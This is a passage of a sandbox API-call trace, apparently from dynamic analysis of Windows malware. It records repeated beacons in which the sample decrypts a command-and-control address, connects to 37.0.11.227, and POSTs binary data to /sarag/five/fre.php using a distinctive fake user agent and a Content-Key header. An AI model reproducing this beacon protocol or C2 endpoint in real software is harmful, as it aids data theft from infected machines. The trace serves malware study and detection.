*/*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0345.344] GetProcessHeap () returned 0x690000 [0345.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0345.345] GetProcessHeap () returned 0x690000 [0345.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.345] GetProcessHeap () returned 0x690000 [0345.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0345.345] GetProcessHeap () returned 0x690000 [0345.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0345.346] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.346] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0345.346] GetProcessHeap () returned 0x690000 [0345.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0345.346] GetProcessHeap () returned 0x690000 [0345.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.347] send (s=0xc88, buf=0x6ad508*, len=242, flags=0) returned 242 [0345.348] send (s=0xc88, buf=0x6aba40*, len=159, flags=0) returned 159 [0345.348] GetProcessHeap () returned 0x690000 [0345.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0345.348] recv (in: s=0xc88, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0345.420] GetProcessHeap () returned 0x690000 [0345.421] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0345.421] GetProcessHeap () returned 0x690000 [0345.422] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0345.422] GetProcessHeap () returned 0x690000 [0345.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0345.423] GetProcessHeap () returned 0x690000 [0345.423] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0345.423] closesocket (s=0xc88) returned 0 [0345.424] GetProcessHeap () returned 0x690000 [0345.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0345.424] GetProcessHeap () returned 0x690000 [0345.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.424] GetProcessHeap () returned 0x690000 [0345.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0345.425] GetProcessHeap () returned 0x690000 [0345.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0345.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19d8) returned 0xc88 [0345.427] Sleep (dwMilliseconds=0xea60) [0345.428] GetProcessHeap () returned 0x690000 [0345.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0345.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0345.443] GetProcessHeap () returned 0x690000 [0345.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0345.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.444] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0345.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.446] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.452] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.452] GetProcessHeap () returned 0x690000 [0345.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0345.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.453] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.454] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0345.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.455] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0345.456] GetProcessHeap () returned 0x690000 [0345.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.457] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0345.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.458] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0345.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.459] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0345.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.460] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0345.460] GetProcessHeap () returned 0x690000 [0345.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0345.460] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0345.460] GetProcessHeap () returned 0x690000 [0345.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0345.462] GetProcessHeap () returned 0x690000 [0345.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.462] GetProcessHeap () returned 0x690000 [0345.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0345.463] GetProcessHeap () returned 0x690000 [0345.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0345.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0345.477] GetProcessHeap () returned 0x690000 [0345.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0345.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.479] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0345.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.480] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.481] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.481] GetProcessHeap () returned 0x690000 [0345.481] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0345.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.482] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0345.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.483] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0345.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.484] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0345.485] GetProcessHeap () returned 0x690000 [0345.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.486] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0345.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.487] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0345.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.488] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0345.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.490] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0345.490] GetProcessHeap () returned 0x690000 [0345.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0345.490] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0345.490] GetProcessHeap () returned 0x690000 [0345.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0345.490] socket (af=2, type=1, protocol=6) returned 0xc8c [0345.490] connect (s=0xc8c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0345.520] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0345.520] GetProcessHeap () returned 0x690000 [0345.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0345.520] GetProcessHeap () returned 0x690000 [0345.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0345.521] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.522] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0345.522] GetProcessHeap () returned 0x690000 [0345.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0345.522] GetProcessHeap () returned 0x690000 [0345.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.523] GetProcessHeap () returned 0x690000 [0345.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0345.523] GetProcessHeap () returned 0x690000 [0345.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0345.524] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.525] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0345.525] GetProcessHeap () returned 0x690000 [0345.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0345.525] GetProcessHeap () returned 0x690000 [0345.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.526] send (s=0xc8c, buf=0x6ad508*, len=242, flags=0) returned 242 [0345.526] send (s=0xc8c, buf=0x6aba40*, len=159, flags=0) returned 159 [0345.526] GetProcessHeap () returned 0x690000 [0345.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0345.526] recv (in: s=0xc8c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0345.666] GetProcessHeap () returned 0x690000 [0345.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0345.666] GetProcessHeap () returned 0x690000 [0345.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0345.667] GetProcessHeap () returned 0x690000 [0345.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0345.667] GetProcessHeap () returned 0x690000 [0345.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0345.668] closesocket (s=0xc8c) returned 0 [0345.668] GetProcessHeap () returned 0x690000 [0345.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0345.668] GetProcessHeap () returned 0x690000 [0345.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.669] GetProcessHeap () returned 0x690000 [0345.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0345.669] GetProcessHeap () returned 0x690000 [0345.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0345.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19dc) returned 0xc8c [0345.685] Sleep (dwMilliseconds=0xea60) [0345.692] GetProcessHeap () returned 0x690000 [0345.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0345.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.694] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.704] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0345.710] GetProcessHeap () returned 0x690000 [0345.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0345.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.711] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0345.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.712] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.713] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.713] GetProcessHeap () returned 0x690000 [0345.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0345.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.715] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0345.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.715] CryptDestroyKey (hKey=0x69d028) returned 1 [0345.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.716] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0345.716] GetProcessHeap () returned 0x690000 [0345.716] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.717] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0345.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.718] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0345.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.719] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0345.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.720] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0345.720] GetProcessHeap () returned 0x690000 [0345.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0345.720] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0345.720] GetProcessHeap () returned 0x690000 [0345.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0345.721] GetProcessHeap () returned 0x690000 [0345.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0345.721] GetProcessHeap () returned 0x690000 [0345.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0345.722] GetProcessHeap () returned 0x690000 [0345.722] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0345.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.722] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0345.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0345.732] GetProcessHeap () returned 0x690000 [0345.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0345.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.733] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0345.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.734] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0345.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.735] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0345.735] GetProcessHeap () returned 0x690000 [0345.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0345.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.747] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0345.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.748] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0345.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0345.749] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0345.749] GetProcessHeap () returned 0x690000 [0345.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0345.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.749] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0345.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.750] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0345.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.751] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0345.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0345.752] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0345.752] GetProcessHeap () returned 0x690000 [0345.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0345.752] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0345.752] GetProcessHeap () returned 0x690000 [0345.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0345.752] socket (af=2, type=1, protocol=6) returned 0xc90 [0345.753] connect (s=0xc90, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0345.778] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0345.778] GetProcessHeap () returned 0x690000 [0345.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0345.778] GetProcessHeap () returned 0x690000 [0345.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0345.778] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.779] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0345.779] GetProcessHeap () returned 0x690000 [0345.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0345.779] GetProcessHeap () returned 0x690000 [0345.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0345.780] GetProcessHeap () returned 0x690000 [0345.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0345.780] GetProcessHeap () returned 0x690000 [0345.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0345.781] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0345.781] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0345.781] GetProcessHeap () returned 0x690000 [0345.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 